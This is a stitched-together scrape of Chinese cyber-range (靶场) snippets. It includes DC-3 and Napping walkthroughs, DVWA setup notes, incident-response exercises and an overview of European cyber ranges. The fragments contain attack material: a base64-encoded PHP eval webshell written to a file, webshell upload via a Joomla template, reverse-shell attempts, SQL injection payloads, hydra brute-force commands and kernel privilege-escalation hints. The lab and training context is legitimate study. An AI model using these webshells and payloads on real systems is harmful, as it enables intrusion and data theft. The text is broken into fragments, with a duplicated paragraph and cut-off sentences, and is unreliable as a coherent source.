基本信息 Kali:192.168.61.145 DC3:192.168.61.163 ---- 实验过程 同样先通过arpscan扫描找出DC3的IP地址 sudo arp‐scan 这里可以直接看出DC3的IP地址为192.168.61.163 然后我们使用nmap对目标进行扫描 发现目标主机只是打开了80端口 ? 这里编辑Beez3模板 ? 这里我在html目录下创建了一个名为dfz.php的webshell ? 然后我们访问下这个webshell,没有出现404说明成功上传 http://192.168.61.163/templates/beez3/html/dfz.php ? 接下来用蚁剑来链接 ? 发现DC3上有python环境,尝试使用python来弹shell,但是Kali上没有任何反应 ? 然后尝试使用bash来弹shell,但是也是不行 ?
0x00 前言好靶场是一个国内唯一一家以真实SRC报告制作靶场的网络安全靶场平台。现在推出了PHP代码审计靶场,快来玩吧。 https://github.com/haobachang-1/haobachangBlog/blob/main/README.md0x00 使用方式靶场名称:PHP代码审计CodeHunter3图片0x01 $_GET['id'])2{3header('Location: run.php?
人间烟火气,最温暖人心 目录: DVWA靶场的概括: 下载 DVWA: 下载 phpStudy: DVWA靶场的安装步骤: ---- DVWA靶场的概括: DVWA 是一个入门的 Web 安全学习靶场(包含:暴力激活成功教程,命令注入,文件包含,文件上传,不安全的验证码,SQL注入,跨站脚本,xss等.)提供给想学 Web安全 的人进行学习. 1Ts7cBMLchlWa7Nd7hXAfww 提取码:tian 下载 phpStudy: 链接:https://pan.baidu.com/s/1825JH7Z6lVCFp7DHlQWdSg 提取码:tian DVWA靶场的安装步骤 (2)把DVWA解压放到网站根目录下 第四步:(1)打开DVWA找到config,将其打开 (2)config.inc.php.dist文件复制一个出来 (3) (3)DVWA靶场的账号:admin 密码:password (4)成功进入后的页面.
下载好靶场(前来挑战!应急响应靶机训练-Web3)并搭建好环境,使用帐号密码(administrator / xj@123456)登录靶机。 二、隐藏用户名称 使用命令compmgmt.msc打开计算机管理,在系统工具->本地用户和组->用户下,发现以 三、黑客遗留下的flag【3个】 第一个flag: 使用命令compmgmt.msc打开计算机管理
下载好靶场(前来挑战!应急响应靶机训练-Web2)并搭建好环境,使用帐号密码(administrator / Zgsf@qq.com)登录靶机。 一、攻击者的IP地址(两个)? 3、是ftp攻击。 查看FTP日志,发现192.168.126.135存在大量登录失败记录,疑似爆破FTP弱口令。 最终登录成功,疑似成功爆破出FTP的弱口令。
0x00 前言最近遇到很多在做基础靶场的小伙伴们都在SQLMap一把索,那么所幸搞一个SQLMap绕过的靶场。我们是好靶场,一个立志于让所有学习安全的同学用上好靶场的团队。
0x01靶机概述 靶机基本信息: 靶机下载链接 https://download.vulnhub.com/dc/DC-3-2.zip 作者 DCAU 发布日期 2020年4月25日 难度 中等 0x02靶场环境搭建 下载完成后,里面有一个ova的文件,直接导入到VirtualBox当中,如下图 设置一下网卡模式,我这里用的是仅主机模式 之后直接启动就可以了 0x03主机发现 arp-scan -l 直接上nmap扫描 nmap-sV -T4 -n 192.168.56.107 经过nmap扫描发现靶机只开放一个80端口,直接访问,如下图 0x04靶场渗透过程 直接上dirb扫描目录试试 /doubleput 然后等待程序运行完成之后,就提升为root权限了 最后查找flag文件 0x06渗透实验总结 1、这个靶场主要考了Joomla的cms框架,然后就是一个外部的提权文件来进行提权 2、因此还是得要多熟悉一下常用的cms,说实话,这个上传点还找了蛮久的哈哈哈 3、希望有不足之处,欢迎各位师傅点评一下!
hydra命令需要使用-u参数,详见《攻防靶场(32):两个爆破技巧 Funbox 7 EasyEnum》。 2. 3. 权限提升 3.1 计划任务/作业:Cron uid是1000的saint用户存在计划任务,每3分钟会执行一次当前www-data用户没有read和write权限的/home/saint/.sync-data 分隔成3部分的配置文件: 第一部分是“日-月-年”格式的时间(最终会使用时间最新的一份),第二部分是字符“cofig”,第三部分是字符“json”。 配置文件的格式是json或dict。 每隔3分钟,可以看到uid是1000的saint用户执行了计划任务。 使用SSH私钥文件登录22/SSH服务,获得saint用户权限。
使用 python 创建一个 tty 控制台,用于 sudo 提权 python3 -c 'import pty;pty.spawn("/bin/bash")' 使用 sudo -l 发现需要使用密码
突破有防护的靶场 首先使用常规的目录扫描,无法正常扫描出东西 使用代理池低速扫描成功发现robots.txt 访问/SiteServer/跳转至登陆页面,谷歌一波发现历史漏洞,直接禁用js可重置密码
突破有防护的靶场 首先使用常规的目录扫描,无法正常扫描出东西 使用代理池低速扫描成功发现robots.txt 访问/SiteServer/跳转至登陆页面,谷歌一波发现历史漏洞,直接禁用js可重置密码
自建内网靶场 https://github.com/yangzongzhuan/RuoYi/releases ruoyi-admin\target\classes\application-druid.yml /sx1.php",base64_decode("PD9waHAKZXZhbCgkX1BPU1RbInBhc3MiXSk7"));
所以,其实命令是包含了 docker-compose up -d docker-compose build 但是如果更新了配置文件,则需要手工来重新编译靶场环境。
,将插件放到和virtualbox同一个目录下,并且将插件导入到virtualbox中
欧洲作为仅次于美军的经济和军事发达地区,网络空间靶场的建设也不甘落后。在美军珠玉在前的网络空间靶场建设态势下,英国、法国、瑞典、芬兰等欧洲国家先后建立了自己的网络空间靶场。 本文将欧洲的网络空间靶场类型分为三种:一是美系支持或建设的网络空间靶场,典型的包括英国的联邦网络空间靶场、北约在爱沙尼亚塔林建立的北约网络空间靶场;二是部分欧洲国家自主建设的网络空间靶场,如法国、瑞典的网络空间靶场 ,也推出有自身的网络空间靶场,其网络空间靶场主要的客户主要是欧美系的军政单位,比较知名的除英国联邦网络空间靶场(FCR),还有澳大利亚国防军的网络空间靶场。 ,从国家级的联合网络空间靶场到国家及行业、军种的专业靶场,均涉及大规模的靶场间联合资源共享和任务调度。 这为我们建设网络空间靶场提供了较好的经验价值; 3、网络空间靶场的建设、运营和维护多采取出军民融合的模式,大部分的国家网络空间靶场都交给网络安防领域实力强大的军工或专业软件企业负责;最为典型的是美国的军火商洛克希德
and substr(database(),1,1)='k' 回显正常 接下来剩余11位不可能一个个挨着手动注入测试,这里配合Burp使用: image.png 得到库名:kanwolongxia 3. 靶场:你礼貌吗???? 我又是Burp抓包喂Request又是--technique B直接让给用布尔盲注方法,也可能是最近网太差了,李师傅决定还是直接手工注入吧。 靶场:你礼貌吗???? 我又是Burp抓包喂Request又是--technique B直接让给用布尔盲注方法,也可能是最近网太差了,李师傅决定还是直接手工注入吧。 flaglo from loflag limit 2,1),1,1)='z' -- qwe 得到flag:zKaQ-Moren image.png Pass-13 延时注入-1 经过简单测试可知,该靶场为双引号闭合 ,由于靶场对Burp和Sqlmap的限制导致了很多情况下难以跑出结果,只能靠自己对sql语句的一再审核有时候我以为我自己写错了于是乎一遍遍的改,但是其实并没有有时候我以为我自己写错了于是乎一遍遍的改,但是其实并没有
DVWA作为安全靶场软件,集合了各种常见的漏洞PHP代码。 安全靶场有很多种,DVWA是众多靶场中的一个,对于经典的PHP的Web漏洞,DVWA虽然不能说表现的多么惊艳,但对于模拟漏洞的现场,用于复现测试,可以达到预期效果,例如:WebShell执行这种漏洞的复现
,但是我对pop3协议不熟悉啊,不能直接通过网页访问该服务啊,也不知道怎么利用,于是直接在网上扫pop3协议怎么利用 POP3爆破 概述:POP3,全名为“Post Office Protocol - Version 3”,即“邮局协议版本3”。 -e nsr -t 22 IP pop3 hydra -s PORT -L USERNAME_LIST -P PASSWORD_LIST -e nsr -t 22 IP pop3 PORT:pop3 www.baidu.com --log-xml=baidu.xml #将扫描结果导出至文件内 两种思路: 1、直接找关于moodle历史漏洞(尝试匹配版本进行利用) 尝试找最近的高危漏洞来对这个18年的靶场进行降维打击 /les.sh 这里使用脏牛漏洞,当然还有其他内核漏洞可以使用 适用范围:2.6.22<内核版本<3.9 通过编译器类型枚举,发现靶场没有gcc编译器,存在clang编译器 gcc --version
0x01 靶场信息 下载地址:https://www.vulnhub.com/entry/napping-101,752/ 发布日期:2021 年 10 月 22 日 作者:hadrian3689 描述 python3 -c 'import pty;pty.spawn("/bin/bash")' ## 本地终端查看当前终端环境变量 (kali㉿kali)-[~/Desktop] $ echo $TERM 密码,x表示密码保存在/etc/shadow 3. UID,0代表root 4. GID,表示所在组 5. 加密后的密码 3. 上次修改密码的时间(从1970.1.1开始的总天数) 4. 两次修改密码间隔的最少天数,如果为0,则没有限制 5. E6%96%B9%E6%B3%95%E7%9A%84%E6%8A%80%E6%9C%AF%E6%95%B4%E7%90%86
开启靶场2.正文首先来看这道题,网络安全是什么?这道题目,保护计算机免受病毒太片面了,我们不仅仅只是保护计算机免受病毒侵害。 我们好靶场的课程0-1是完全免费的,这个道题没有任何的疑问。第三道题目,我们之前有讲过,写博客写笔记可以让我们将学过的东西加深印象,妙用无穷,所以选择第二个就可以了,其他选项都有问题。 这个是我们本靶场获取的精美徽章。祝大家都能学好网络安全